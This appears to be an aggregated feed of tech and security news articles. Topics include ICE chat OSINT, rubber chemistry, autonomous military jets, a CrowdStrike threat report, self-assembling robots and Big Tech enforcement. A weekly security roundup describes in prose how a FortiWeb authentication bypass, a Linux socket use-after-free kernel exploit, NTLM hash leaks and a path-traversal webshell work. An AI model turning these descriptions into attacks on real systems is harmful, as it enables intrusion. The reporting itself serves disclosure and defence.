Salta al contenuto principale



This week, we discuss OSINT for chat groups, Russell Crowe films, and storage problems.#BehindTheBlog


Behind the Blog: Exercises in OSINT and Storage Pains


This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss OSINT for chat groups, Russell Crowe films, and storage problems.

JOSEPH: On Wednesday we recorded a subscribers podcast about the second anniversary of 404 Media. That should hit your feeds next week or so. Towards the end of recording, I went silent for a bit. I said on air sorry about that, a source just sent me an insane tip, or something like that.

That tip led to ICE Adds Random Person to Group Chat, Exposes Details of Manhunt in Real-Time. Definitely read the piece if you haven’t already. It presented an interesting verification challenge. Essentially I was given these screenshots which included phone numbers but I didn’t know exactly who was behind each one. I didn’t know their names, nor their agencies. It sure looked like a conversation involving ICE though, because it included a “Field Operations Worksheet” covered in ICE branding. But I needed to know who was involved. I didn’t think DHS or ICE would help because they are taking multiple days to reply to media requests if they do at all at the moment. So I had to do something else.

Upgrade to continue reading


Become a paid member to get access to all premium content
Upgrade




Gentle Processing Makes Better Rubber That Cracks Less


Rubber! It starts out as a goopy material harvested from special trees, and is then processed into a resilient, flexible material used for innumerable important purposes. In the vast majority of applications, rubber is prized for its elasticity, which eventually goes away with repeated stress cycles, exposure to heat, and time. When a rubber part starts to show cracks, it’s generally time to replace it.

Researchers at Harvard have now found a way to potentially increase rubber’s ability to withstand cracking. The paper, published in Nature Sustainability, outlines how the material can be treated to provide far greater durability and toughness.

Big Flex

Note the differences between a short-chain crosslinked structure, and the longer-chain tanglemer structure with far less crosslinks. The latter is far better at resisting crack formation, since the longer chain can deconcentrate stress over a longer distance, allowing far greater stretch before failure. Credit: research paper
The traditional method of producing rubber products starts with harvesting the natural rubber latex from various types of rubber tree. The trees are tapped to release their milky sap, which is then dried, processed with additives, and shaped into the desired form before heating with sulfur compounds to vulcanize the material. It’s this last step that is key to producing the finished product we know as rubber, as used in products like tires, erasers, and o-rings. The vulcanization process causes the creation of short crosslinked polymer chains in the rubber, which determine the final properties and behavior of the material.

Harvard researchers modified the traditional rubber production process to be gentler. Typical rubber production includes heavy-handed mixing and extruding steps which tend to “masticate” the polymers in the material, turning them into shorter chains. The new, gentler process better preserves the long polymer chains initially present in the raw rubber. When put through the final stages of processing, these longer chains form into a structure referred to as a “tanglemer”, where the tangles of long polymer chains actually outnumber the sparse number of crosslinks between the chains in the structure.
The gentler production method involves drying the latex and additive mixture at room temperature to form a film, before hot-pressing it to form the final tanglemer structure. This process isn’t practical for producing large, thick parts. Credit: research paper
This tanglemer structure is much better at resisting crack formation. “At a crack tip in the tanglemer, stress deconcentrates over a long polymer strand between neighbouring crosslinks,” notes the research paper. “The entanglements function as slip links and do not impede stress deconcentration, thus decoupling modulus and fatigue threshold.” Plus, these long, tangled polymer chains are just generally better at spreading out stress in the material than the shorter crosslinked chains found in traditional vulcanized rubber. With the stress more evenly distributed, the rubber is less likely to crack or fail in any given location. The material is thus far tougher, more durable, and more flexible. These properties hold up even over repeated loading cycles.

youtube.com/embed/UvGIVUFnsjg?…

Overall, the researchers found the material to be four times better at resisting crack growth during repeated stretch cycles. It also proved to be ten times tougher than traditional rubber. However, the new gentler processing method is fussy, and cannot outperform traditional rubber processing in all regards. After all, there’s a reason things are done the way they are in industry. Most notably, it relies on a lot of water evaporation, and it’s not currently viable for thick-wall parts like tires, for example. For thinner rubber parts, though, the mechanical advantages are all there—and this method could prove useful.

Ultimately, don’t expect to see new this ultra-rubber revolutionizing the tire market or glove manufacturing overnight. However, the research highlights an important fact—rubber can be made with significantly improved properties if the longer polymer chains can be preserved during processing, and tangled instead of excessively cross-linked. There may be more fruitful ground to explore to find other ways in which we can improve rubber by giving it a better, more resilient structure.


hackaday.com/2025/08/15/gentle…



Droni in missione potranno decidere in modo autonomo quali uomini uccidere?


Sembra che gli Stati Uniti abbiano già seriamente preso in considerazione il concetto di guerra autonoma. Il jet da combattimento autonomo della DARPA , risulta in grado di combattere senza pilota, non è più considerato una svolta: l’agenzia è passata alla fase successiva di sviluppo, con l’obiettivo di creare sistemi in grado di controllare un gruppo di jet da combattimento in missioni congiunte oltre il raggio visivo.

Il nuovo programma della DARPA, Artificial Intelligence Reinforcements (AIR), si basa sul progetto Air Combat Evolution (ACE) , che ha messo a confronto F-16 dotati di intelligenza artificiale con velivoli con equipaggio in un addestramento “dogfight”. L’obiettivo è aumentare l’autonomia fino al punto in cui tali velivoli possano operare in formazione, coordinandosi su lunghe distanze e in ambienti di combattimento complessi. Il programma fa parte di una più ampia militarizzazione dell’intelligenza artificiale che sta sollevando preoccupazioni sulla sua sicurezza.

Sebbene AIR sia stato avviato più tardi di ACE, il concetto in sé non è nuovo: la prima domanda per il programma è stata pubblicata nel 2022. Questa settimana, la DARPA ha assegnato silenziosamente a Systems & Technology Research (STR) un contratto da 11,3 milioni di dollari nell’ambito della cosiddetta “Opzione Uno“. Come ha spiegato l’agenzia, questa è già la seconda delle due fasi previste del programma, il che indica che il progetto sta procedendo.

All’inizio di AIR, il programma coinvolgeva sei appaltatori, ma nella seconda fase il numero è stato ridotto a quattro. STR è responsabile di una delle due aree tecniche chiave: lo sviluppo di algoritmi che consentiranno l’esecuzione distribuita e autonoma di missioni tattiche in tempo reale in ambienti incerti, in rapida evoluzione e complessi. La seconda area prevede la creazione di modelli rapidi e accurati in grado di tenere conto dell’incertezza e di migliorare automaticamente con l’accumulo di dati.

Secondo la documentazione iniziale, l’AIR dovrebbe utilizzare sistemi di sensori, sistemi di guerra elettronica e armi esistenti. Le fasi di test includeranno simulazioni, quindi test con un essere umano nel circuito di controllo e infine test su un vero velivolo da combattimento senza pilota. Sviluppi simili sono già stati dimostrati: l’esercito statunitense ha creato un sistema robotico in grado di abbattere autonomamente i droni.

Oltre a STR, al progetto hanno partecipato anche Lockheed Martin e BAE Systems , ma la DARPA non ha ancora reso noto chi sarà incluso esattamente nella seconda fase: la selezione dei partecipanti è ancora in corso. I dettagli del lavoro nella prima e nella seconda fase rimangono riservati, ma è noto che la prossima fase durerà circa 30 mesi e coprirà la parte restante del programma.

La questione di quando i piloti saranno effettivamente costretti a cedere il passo all’intelligenza artificiale rimane aperta. E mentre gli sviluppatori stanno testando l’autonomia tattica, i critici non escludono scenari più inaspettati, fino al punto che un giorno un jet da combattimento autonomo decida di abbandonare una missione di combattimento. Gli esperti avvertono che la diffusione dell’IA militare potrebbe rendere il mondo meno sicuro , poiché l’IA commette errori e le conseguenze possono essere fatali . La comunità internazionale sta cercando di sviluppare un patto globale contro l’IA militare .

L'articolo Droni in missione potranno decidere in modo autonomo quali uomini uccidere? proviene da il blog della sicurezza informatica.



certo che la poltrona è di pelle... senza dubbio... la mia pelle che in estate si stacca da me e rimane attaccata alla sedia... pelle umana.


Hackaday Podcast Episode 333: Nightmare Whiffletrees, 18650 Safety, and a Telephone Twofer


This week, Hackaday’s Elliot Williams and Kristina Panos met up over the tubes to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

In Hackaday news, get your Supercon 2025 tickets while they’re hot! Also, the One Hertz Challenge ticks on, but time is running out. You have until Tuesday, August 19th to show us what you’ve got, so head over to Hackaday.IO and get started now. Finally, its the end of eternal September as AOL discontinues dial-up service after all these years.

On What’s That Sound, Kristina got sort of close, but this is neither horseshoes nor hand grenades. Can you get it? If so, you could win a limited edition Hackaday Podcast t-shirt!

After that, it’s on to the hacks and such, beginning with a talking robot that uses typewriter tech to move its mouth. We take a look at hacking printed circuit boards to create casing and instrument panels for a PDP-1 replica. Then we explore a fluid simulation business card, witness a caliper shootout, and marvel at one file in six formats. Finally, it’s a telephone twofer as we discuss the non-hack-ability of the average smart phone, and learn about what was arguably the first podcast.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and savor at your leisure.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:



Episode 333 Show Notes:

News:



What’s that Sound?



Interesting Hacks of the Week:



Quick Hacks:



Can’t-Miss Articles:



hackaday.com/2025/08/15/hackad…




Why Lorde’s Clear CD has so Many Playback Issues


2003 Samsung CD player playing a clear vs normal audio CD. (Credit: Adrian's Digital Basement)

Despite the regularly proclaimed death of physical media, new audio albums are still being published on CD and vinyl. There’s something particularly interesting about Lorde’s new album Virgin however — the CD is a completely clear disc. Unfortunately there have been many reports of folks struggling to get the unique disc to actually play, and some sharp-eyed commentators have noted that the CD doesn’t claim to be Red Book compliant by the absence of the Compact CD logo.
The clear Lorde audio CD in all its clear glory. (Credit: Adrian's Digital Basement, YouTube)The clear Lorde audio CD in all its clear glory. (Credit: Adrian’s Digital Basement, YouTube)
To see what CD players see, [Adrian] of Adrian’s Digital Basement got out some tools and multiple CD players to dig into the issue. These players range from a 2003 Samsung, a 1987 NEC, and a cheap portable Coby player. But as all audio CDs are supposed to adhere to the Red Book standard, a 2025 CD should play just as happily on a 1980s CD player as vice versa.

The first step in testing was to identify the laser pickup (RF) signal test point on the PCB of each respective player. With this hooked up to a capable oscilloscope, you can begin to see the eye pattern forming. In addition to being useful with tuning the CD player, it’s also an indication of the signal quality that the rest of the CD player has to work with. Incidentally, this is also a factor when it comes to CD-R compatibility.

While the NEC player was happy with regular and CD-R discs, its laser pickup failed to get any solid signal off the clear Lorde disc. With the much newer Samsung player (see top image), the clear CD does play, but as the oscilloscope shot shows, it only barely gets a usable signal from the pickup. Likewise, the very generic Coby player also plays the audio CD, which indicates that any somewhat modern CD player with its generally much stronger laser and automatic gain control ought to be able to play it.

That said, it seems that very little of the laser’s light actually makes it back to the pickup’s sensor, which means that the gain gets probably cranked up to 11, and with that its remaining lifespan will be significantly shortened. Ergo it’s probably best to just burn that CD-R copy of the album and listen to that instead.

youtube.com/embed/s3IvVUh3mt4?…


hackaday.com/2025/08/15/why-lo…



CrowdStrike Global Threat Report 2025: l’anno dell’avversario intraprendente


CrowdStrike ha pubblicato il suo Global Threat Report 2025, che documenta un balzo in avanti nel comportamento dei criminali informatici e dei gruppi statali. Gli esperti definiscono il 2024 “l’anno dell’avversario intraprendente“: gli aggressori si comportano come aziende mature, introducendo innovazioni, costruendo catene di approvvigionamento resilienti e utilizzando attivamente l’intelligenza artificiale .

L’indicatore principale – il tempo di breakout, ovvero il periodo che intercorre tra la penetrazione iniziale e l’inizio del movimento laterale attraverso la rete – è stato ridotto al minimo storico: una media di 48 minuti contro i 62 minuti dell’anno precedente. Il record assoluto è di 51 secondi, il che di fatto priva i difensori del tempo necessario per reagire.

Nel 79% dei casi rilevati, gli aggressori non hanno utilizzato file dannosi, ma hanno agito tramite strumenti di amministrazione legittimi e operazioni manuali (hands-on-keyboard). Questo approccio consente loro di camuffarsi come una normale attività utente e di aggirare l’EDR . Gli strumenti di gestione remota (RMM) sono particolarmente utilizzati, tra cui Microsoft Quick Assist e TeamViewer.

Gli attacchi di vishing sono esplosi nell’ultimo anno, con un aumento del 442% nella seconda metà del 2024 rispetto alla prima. I gruppi CURLY SPIDER, CHATTY SPIDER e PLUMP SPIDER hanno utilizzato attivamente le telefonate come vettore principale, spesso in combinazione con lo “spam bombing“, ovvero l’invio massivo di reclami che fungono da pretesto per una chiamata “dall’assistenza”. In alcuni casi, questi schemi si sono conclusi con l’installazione di backdoor e il lancio del ransomware Black Basta .

Si sta diffondendo anche l’ingegneria sociale nell’help desk, in cui gli aggressori si spacciano per dipendenti aziendali e convincono gli operatori a reimpostare le password o a disattivare l’autenticazione a più fattori. Questa tattica è utilizzata, tra gli altri, da SCATTERED SPIDER ed è diventata uno dei metodi chiave per compromettere account cloud e applicazioni SaaS.

Il 2024 ha segnato una svolta nell’uso dell’IA Gen da parte di criminali informatici e attori statali. I modelli LLM sono stati utilizzati per:

  • creazione di profili e immagini falsi (ad esempio, il famoso CHOLLIMA nordcoreano);
  • generare e-mail e siti Web di phishing che hanno mostrato un CTR superiore del 54% rispetto ai messaggi scritti da esseri umani;
  • deepfake negli schemi BEC: in un caso, sono stati rubati 25,6 milioni di dollari tramite questi metodi;
  • scrivere script e strumenti dannosi;
  • creazione di siti “deco” nelle campagne NITRO SPIDER.

È emerso anche un nuovo fenomeno: LLMJacking : il furto dell’accesso ai servizi di intelligenza artificiale aziendali nel cloud per rivenderli o utilizzarli in altri attacchi.

Il numero di attacchi con tracce cinesi è aumentato in media del 150% e del 200-300% nei settori finanziario, mediatico, manifatturiero e ingegneristico. Sono stati identificati nuovi gruppi specializzati: LIMINAL PANDA, LOCKSMITH PANDA, OPERATOR PANDA, VAULT PANDA ed ENVOY PANDA, ognuno con la propria specializzazione di nicchia, dalle telecomunicazioni e dalla finanza alle agenzie diplomatiche. Gli operatori cinesi utilizzano attivamente reti ORB composte da centinaia e migliaia di dispositivi hackerati per nascondere il traffico e utilizzano congiuntamente strumenti precedentemente unici, come il malware KEYPLUG.

Il famoso gruppo CHOLLIMA ha implementato campagne su larga scala utilizzando falsi dipendenti IT che ottengono lavoro presso aziende straniere, ricevono dispositivi aziendali e li consegnano a “laboratori di laptop” per installare backdoor. CrowdStrike ha registrato 304 incidenti che li hanno coinvolti, il 40% dei quali riguardava minacce interne.

Gli attacchi al cloud sono aumentati del 26%. Il 35% di questi è iniziato con la compromissione di account attivi, mentre gli aggressori preferiscono non modificare le password per non destare allarme. Vengono utilizzati sia il furto di credenziali tramite infostealer (Stealc, Vidar) sia l’abuso di connessioni attendibili tra aziende.

Una parte significativa degli attacchi si basa sull’utilizzo concatenato di exploit e sull’abuso di funzioni software legittime. Ad esempio, OPERATOR PANDA ha utilizzato una serie di vulnerabilità in Cisco IOS per attaccare società di telecomunicazioni e di consulenza negli Stati Uniti.

CrowdStrike prevede che la velocità degli attacchi e l’uso diffuso dell’intelligenza artificiale continueranno ad aumentare, soprattutto negli ambienti di social engineering e cloud. Per proteggersi da queste minacce, gli esperti raccomandano di dare priorità alla protezione dell’identità, implementare una pianificazione proattiva delle patch, rafforzare i controlli degli account cloud e utilizzare strumenti di threat hunting basati sull’intelligenza artificiale.

L'articolo CrowdStrike Global Threat Report 2025: l’anno dell’avversario intraprendente proviene da il blog della sicurezza informatica.



“L’amore per l’Eucaristia si traduce nella capacità di riconoscere e servire chi vive ai margini. La mensa del Signore ci spinge ad incontrare le periferie del mondo, dove abitano povertà, solitudine, esclusione.


Dopo il bucato, Figure 02 ora piega il bucato. Ma per ora dovrai continuare a farlo da solo


Solamente due settimane fa, il robot umanoide prodotto da Figure ha destato in noi grande meraviglia, quando con destrezza ha preso degli indumenti da un paniere dei panni sporchi e li ha collocati all’interno di una lavatrice. Tutto ciò è apparso estremamente sorprendente.

Un futuro in cui gli esseri umani saranno liberi da questo onere tedioso è mostrato in un nuovo video da Figure, dove si vede lo stesso robot che sistema asciugamani freschi di bucato, per poi metterli da parte piegati.

Today we unveiled the first humanoid robot that can fold laundry autonomously

Same exact Helix architecture, only new data pic.twitter.com/0iEToKfETD
— Figure (@Figure_robot) August 12, 2025

Grazie a un nuovo set di dati specifico per la piegatura della biancheria, Figura02 adotta lo stesso modello Helix Vision Language Action (VLA) già impiegato dall’azienda nelle operazioni di logistica industriale, con l’obiettivo di guidare il processo in modo efficiente.

L’azienda tecnologica con sede in California ha dichiarato di aver realizzato il primo robot umanoide in grado di piegare il bucato “in modo completamente autonomo”, un’affermazione che sicuramente farà sì che milioni di persone in tutto il mondo si chiedano all’istante: “Allora, dove posso trovarne uno?”.

Il robot svolge l’operazione di pulizia in piena autonomia, senza necessità di interventi manuali o direttive specialistiche, grazie all’implementazione di una rete neurale a estremità connesse.

Come potete vedere, il robot usa mani multi-dita per raccogliere con competenza gli asciugamani da una pila. Esegue anche diverse strategie di piegatura, recupera errori come afferrare più asciugamani contemporaneamente ed esegue manipolazioni di precisione, proprio come un essere umano.

Il video dimostra progressi concreti in uno dei settori che gli ingegneri robotici trovano ancora estremamente impegnativi: la manipolazione di oggetti, soprattutto quelli morbidi e flessibili. In effetti, l’impressionante capacità del robot di maneggiare l’umile asciugamano sembra un passo avanti entusiasmante verso la capacità di tali macchine di gestire altri oggetti non rigidi, aprendole a una pletora di altri compiti in una gamma più ampia di contesti.

Nonostante le attenzioni di Figure siano ad oggi focalizzate sull’utilizzo del suo robot dalle sembianze umane all’interno di contesti lavorativi, prossimamente esso verrà collaudato anche nelle abitazioni private, aspetto che risulterà gradito a tutte le persone che non amano le attività di lavanderia.

Piegare il bucato può sembrare banale per una persona, ma è uno dei compiti di manipolazione più impegnativi per un robot umanoide”, ha affermato Figure in un post sul suo sito web. “Gli asciugamani sono deformabili, cambiano forma in continuazione, si piegano in modo imprevedibile e tendono a stropicciarsi o aggrovigliarsi. Non esiste una geometria fissa da memorizzare, né un singolo punto di presa ‘corretto’. Anche un leggero scivolamento di un dito può far arricciare o cadere il tessuto. Il successo richiede più che una semplice visione accurata del mondo: richiede un controllo preciso e coordinato delle dita per tracciare bordi, pizzicare angoli, levigare superfici e adattarsi in tempo reale”.

Figure non ha ancora fornito dettagli sui prezzi e sugli acquisti per i singoli clienti, quindi, almeno per il momento, il bucato lo dobbiamo continuare a fare noi.

L'articolo Dopo il bucato, Figure 02 ora piega il bucato. Ma per ora dovrai continuare a farlo da solo proviene da il blog della sicurezza informatica.





Researchers say this 'robot metabolism' is an early step in giving AI biological style bodies.

Researchers say this x27;robot metabolismx27; is an early step in giving AI biological style bodies.#News


Pentagon Funded Experiment Develops Robots that Change by ‘Consuming’ Other Robots


A team of researchers at Columbia University, funded in part by the Defense Advanced Research Projects Agency, have developed “machines that can grow by consuming other machines.”

Video of the experiment shows tubular robots that move by extending their shafts to inch along the ground. As the tubes gather, they connect and form into more complex shapes like triangles and tetrahedrons. With each piece consumed, the whole moves faster and with more elegance.

“AI systems need bodies to move beyond current limitations. Physical embodiment brings the AI into the messy, constraint-rich real world—and that’s where true generalization has to happen,” Phillipe Martin Wyder, lead researcher on the project, told 404 Media.

The researchers said the experiment was done with a view towards developing a “body” for AI. The idea is to give artificial intelligence a form that can grow, heal, and change similar to a biological body. They published their research in Science Advances under the titleRobot metabolism: Toward machines that can grow by consuming other machines.”

For the experiment, the researchers designed what they called truss links: “a simple, expandable, and contractible, bar-shaped robot module with two free-form magnetic connectors on each end.” Each truss link is almost a foot long when fully contracted and weighs more than half a pound. When the Links move individually they look like plastic worms inching across the ground, but their motion becomes more fluid and interesting as they gather to each other, forming complex shapes that allow them to move faster.
youtube.com/embed/UDYLUnniysU?…
Right now, the truss links are controlled by a human on a keyboard and not artificial intelligence. “It’s not AI-controlled yet, but that’s partially the point: this architecture is a step towards future AI-controlled self-assembling physical systems,” Wyder said.

Wyder and his team controlled the truss links remotely and ran the robots through several obstacle courses. Some of the motions of the machines were preprogrammed with specially designed loops with names like “ratchet crawl” and “tetrahedron topple” that the researchers could activate with the push of a button. “There’s no autonomous AI running in the loop yet, but that’s the direction we’re heading,” he said.
Image via Columbia University.
Wyder said that giving AI a body was in its very early stages. “Miniaturization is also on the table—more links, smaller size, finer resolution,” he said. “But I don’t believe a single platform will suit every task. Deep-sea robots, Mars colony builders, assistive home systems—they’ll need different form factors. The deeper idea here is the metabolic principle, not just the physical design.”

Human consciousness happens at the point where the mind and body interact. A person is not just the thoughts in their head, but also how they react to their environment with their body. All that stimuli shapes our thoughts. Wyder and his team are seeking to, eventually, recreate this phenomenon for AI. The research is exciting, but it’s also very new and there’s no way to know how it’ll play out in the long term.

This need not be a world where AIs are stuck in human-like bodies. He pointed to previous research out of Sweden that used a swarm of robots to form furniture on demand. If such a system were to break, we should not expect the average person to be able to replace the part. But what if the system could order a replacement part and repair itself?

“For this vision to become a reality, we must build robot systems that are intelligent in a way that allows them to keep track of their changing morphology,” Wyder said. “When the idea of modular robots first surfaced in the late 80s this was unthinkable, but I believe that our recent progress in machine learning could allow for intelligent, modular self-assembling machines.”

He also acknowledged there are dangers here. “With our current robots, the worst-case risk is probably a pinched finger. But yes, autonomy plus embodiment demands careful consideration of all the risks. Most robots today still struggle with navigation and manipulation. They’re far from being autonomous agents in the wild, but rather need our care,” he said.

Wyder also said that he doesn’t consider the ethics of this work as an optional part of the research. “Malicious use of robotics is a broader concern and not unique to this platform. Like any powerful technology—nuclear, biotech, AI—governance matters,” he said. “I don’t think this class of robot poses near-term risks, but that doesn’t mean ethical foresight is optional. We have to think about it so we can get it right.”

The researchers will build on this work and that one direction is teaching robots how to exploit environmental factors. “Imagine a climber choosing which rocks to grab—robots need that same affordance awareness,” he said. “We’re working on how robots can reason about their environment and use it to drive reconfiguration or mobility.”

Along with the paper, the researchers have a GitHub and Zenodo that contain the CAD and mesh files, firmware, software, and simulation code for the truss links. Anyone, if they so desired, could build their own bundle of robot-devouring-robots.


#News #x27


This Week in Security: The AI Hacker, FortMajeure, and Project Zero


One of the hot topics currently is using LLMs for security research. Poor quality reports written by LLMs have become the bane of vulnerability disclosure programs. But there is an equally interesting effort going on to put LLMs to work doing actually useful research. One such story is [Romy Haik] at ULTRARED, trying to build an AI Hacker. This isn’t an over-eager newbie naively asking an AI to find vulnerabilities, [Romy] knows what he’s doing. We know this because he tells us plainly that the LLM-driven hacker failed spectacularly.

The plan was to build a multi-LLM orchestra, with a single AI sitting at the top that maintains state through the entire process. Multiple LLMs sit below that one, deciding what to do next, exactly how to approach the problem, and actually generating commands for those tools. Then yet another AI takes the output and figures out if the attack was successful. The tooling was assembled, and [Romy] set it loose on a few intentionally vulnerable VMs.

As we hinted at up above, the results were fascinating but dismal. This LLM successfully found one Remote Code Execution (RCE), one SQL injection, and three Cross-Site Scripting (XSS) flaws. This whole post is sort of sneakily an advertisement for ULTRARED’s actual automated scanner, that uses more conventional methods for scanning for vulnerabilities. But it’s a useful comparison, and it found nearly 100 vulnerabilities among the collection of targets.

The AI did what you’d expect, finding plenty of false positives. Ask an AI to describe a vulnerability, and it will glad do so — no real vulnerability required. But the real problem was the multitude of times that the AI stack did demonstrate a problem, and failed to realize it. [Romy] has thoughts on why this attempt failed, and two points stand out. The first is that while the LLM can be creative in making attacks, it’s really terrible at accurately analyzing the results. The second observation is one of the most important observations to keep in mind regarding today’s AIs. It doesn’t actually want to find a vulnerability. One of the marks of security researchers is the near obsession they have with finding a great score.

DARPA


Don’t take the previous story to mean that AI will never be able do vulnerability research, or even that it’s not a useful tool right now. The US DARPA sponsored a competition at this year’s DEF CON, and another security professional pointed out that Buttercup AI Cyber REasoning System (CRS) is the second place winner. It’s now available as an Open Source project.

This challenge was a bit different from an open-ended attack on a VM. In the DARPA challenge, the AI tools are given specific challenges, and a C or Java codebase, and told to look for problems. Buttercup uses an AI-guided fuzzing approach, and one of the notable advantages with this challenge is that often times a vulnerability will cause an outright crash in the program, and that’s hard to miss, even for an AI.

Team Atlanta took first place, and has some notes on their process. Their first-place finish was almost derailed from the start, due to a path checking rule to comply with contest rules. The AI tools were provided fuzzing harnesses that they were not allowed to modify, and the end goal was for the AIs to actually write patches to fix the issues found. All of the challenges were delivered inside directories containing ossfuzz, triggering the code that protected against breaking the no modification rules. A hasty code hacking session right at the last moment managed to clear this, and saved the entire competition.

FortMajeure


We have this write-up from [0x_shaq], finding a very fun authentication bypass in FortiWeb. The core problem is the lack of validation on part of the session cookie. This cookie has a couple of sections that we care about. The Era field is a single digit integer that seems to indicate a protocol version or session type, while the Payload and AuthHash fields are the encrypted session information and signed hash for verification.

That Era field is only ever expected to be a 0 or a 1, but the underlying code processes the other eight possible values the same way: by accessing the nth element of an array, even if the array doesn’t actually have that many initialized elements. And one of the things that array will contain is the encryption/signing key for the session cookie. This uninitialized memory is likely to be mostly or entirely nulls, making for a very predictable session key.

Project Zero


Google has a couple interesting items on their Project Zero blog. The first is from late July, and outlines a trial change to disclosure timelines. The problem here is that a 90 day disclosure gives the immediate vendor plenty of time to patch an issue, but even with a 30 day extension, it’s a race for all of the downstream users to apply, test, and distribute the fix. The new idea is to add a one week vulnerability pre-disclosure. One week after a vulnerability is found, it’s existence is added to the chart of upcoming releases. So if you ship Dolby’s Unified Decoder in a project or product, mark your calendar for September 25, among the other dozen or so pre-released vulnerabilities.

The second item from Project Zero is a vulnerability found in Linux, that could be triggered from within the Chrome renderer sandbox. At the heart of the matter is the Out Of Band byte that could be sent as a part of Unix Sockets. This is a particularly obscure feature, and yet enabled by default, which is a great combination for security research.

The kernel logic for this feature could get confused when dealing with multiples of these one-byte messages, and eventually free kernel memory while a pointer is still pointing to it. Use the recv() syscall again on that socket, and the freed memory is accessed. This results in a very nice kernel memory read primitive, but also a very constrained write primitive. In this case, it’s to increment a single byte, 0x44 bytes into the now-freed data structure. Turning this into a working exploit was challenging but doable, and mainly consisted of constructing a fake object in user-controlled memory, triggering the increment, and then using the socket again to coerce the kernel into using the fake object.

Bits and Bytes


Cymulate has the story of a Microsoft NTLM patch that wasn’t quite enough. The original problem was that a Windows machine could be convinced to connect to a remote NTLM server to retrieve a .ico file. The same bug can be triggered by creating a shortcut that implies the .ico is embedded inside the target binary itself, and put that on a remote SMB share. It’s particularly bad because this one will acess the server, and leak the NTLM hash, just by displaying the icon on the decktop.

Xerox FreeFlow Core had a pair of exploits, the more serious of which could enable an unauthenticated RCE. The first is an XML External Entity (XXE) injection issue, where a user request could result in the server fetching remote content while processing the request. The more serious is a simple file upload with path traversal, making for an easy webshell dropper.

Claroty’s Team82 dug into the Axis Communications protocol for controlling security cameras, and found some interesting items. The Axis.Remoting protocol uses mutual TLS, which is good. But those are self-signed certificates that never validated, allowing for trivial man in the middle. The most serious issue was a JSON deserialization vulnerability, allowing for RCE on the service itself. Patches are available, and are particularly important for Axis systems that are available on the open Internet.


hackaday.com/2025/08/15/this-w…



“Non dobbiamo rassegnarci al prevalere della logica del conflitto e delle armi”. Con queste parole, Papa Leone XIV ha rilanciato il suo appello per la pace all’Angelus di oggi, Solennità dell’Assunzione della Beata Vergine Maria, celebrato a Castel G…


Tech companies spent $1.2 billion on political influence since 2024. It’s paid off.#News


Trump Has Dropped a Third of All Government Investigations Into Big Tech


The Trump administration has busied itself in the past six months by abandoning prosecutions and investigations into corporations at an unprecedented rate. According to a new report from Public Citizen—a nonprofit government watchdog—the Trump administration has dropped one third of all pending enforcement actions against tech companies. Those same companies collectively spent $1.2 billion on political contributions since 2024, most of it going to Republicans. Some of it went to Trump directly.

According to the report, Trump’s White House has withdrawn or halted enforcement actions against 165 different companies, a quarter of those are tech firms. The administration halted nine of the investigations outright, including a Consumer Financial Protection Bureau (CFPB) investigation into Meta’s alleged misuse of customer financial data. It dismissed or withdrew an additional 38 enforcement actions against big tech, including 13 charges against the crypto exchange Binance for operating as an unlicensed securities exchange.

Everyone with eyes knows that Big Tech has gotten cozy with Trump during his second administration. Mark Zuckerberg and Jeff Bezos were at his inauguration. Elon Musk spent millions to help Trump get elected and Trump rewarded him by giving him direct control of much of the government by allowing him to spearhead DOGE.

“In a way I think the cumulative picture is the most shocking thing, because it reveals a clear pattern of these corporations going to great lengths to both ingratiate themselves with and enmesh themselves within the administration, and Trump’s agencies rewarding those corporations by treating them as if the laws do not apply to them,” Rick Claypool, a research director at Public Citizen’s President’s Office and the author of the report, told 404 Media.

Musk has been one of the big winners. The Department of Labor halted an investigation into Tesla and the Department of Justice dismissed a civil rights case against SpaceX. All it cost him was an estimated $352 million in political spending.

Claypool said that corporate enforcement plummeted during the first administration, and he knew it would happen again during the second term. “But this massive retreat from enforcement and dropping categories of cases involving corporate misconduct is something I’ve never seen before,” he said. “Many of these cases being dropped now originated in the first Trump administration. They were, correctly in my view, pursuing crypto scams.”

One of the more shocking cases involved crypto billionaire Justin Sun. The Securities and Exchange Commission filed charges against Sun for manipulating the market in 2023. After Trump’s election, he purchased $75 million worth of tokens from Trump’s crypto currency company as well as $18.6 million of $TRUMP meme coins. After the inauguration, the SEC sent a letter to the Federal Judge overseeing the case asking for a stay. The Judge granted it.

For Claypool, the signal dropping enforcement against Big Tech sends to the public (and more importantly to corporations) is simple. “It’s not illegal if a tech company does it,” he said, paraphrasing President Richard Nixon’s famous off-the-cuff remark about his crimes during the Frost/ Nixon interviews.

“The big winners are instances when the industry wins policy that serves as pretext for a retreat from whole categories of enforcement,” he said. “This is crypto corporations winning the total retreat of the SEC, fintech corporations winning the near-complete shutdown of the CFPB, and—coming soon—the retreat from FTC enforcement against AI corporations signaled in the admin’s AI Action Plan.”

Claypool said that this kind of massive retreat from corporate enforcement will have long term effects on society. “It distorts the incentives. It gives companies that are willing to risk pushing the limits of the law an unfair advantage over law abiding companies,” he said. “Members of the public are so much more at risk of falling prey to a whole range of scams, privacy invasions, and manipulations. At a societal level, it puts us at much greater risk for the next corporate catastrophe.”

The years leading up to the 2008 Financial Crisis coincided with an unprecedented increase in what Claypool called “questionably legal so-called innovations” such as credit default swaps and collateralized debt obligations on subprime mortgages.

We’re seeing a similar kind of innovation happen in the tech space where billionaires use crypto and AI to spin value out of thin air and curry favor with the Trump administration to avoid the consequences of hurting normal people. It’s only a matter of time before something terrible, on a grand scale, happens again.

“In many ways, what’s happening now is the culmination of years of lax enforcement against corporate lawbreakers. Democratic and Republican administrations for decades have been far too open to striking deals with corporate offenders to help them avoid the full consequences of accountability,” Claypool said. “So now we have this class of corporations and executives that believes it is entitled to escape the consequences of their misconduct. They don’t believe the laws should protect consumers and the public, and they don’t seem to mind risking widespread harms and violations if it means they might grab another billion. And the apparently corrupt way it’s going now, with dropped enforcement seeming to be a reward for insiders and donors, risks leading to a full retreat from federal authority to protect the public from corporate lawbreaking.”


#News


Hai risposto su Teams al supporto IT? Complimenti! Il Trojan è nel PC con diritti superiori ai tuoi


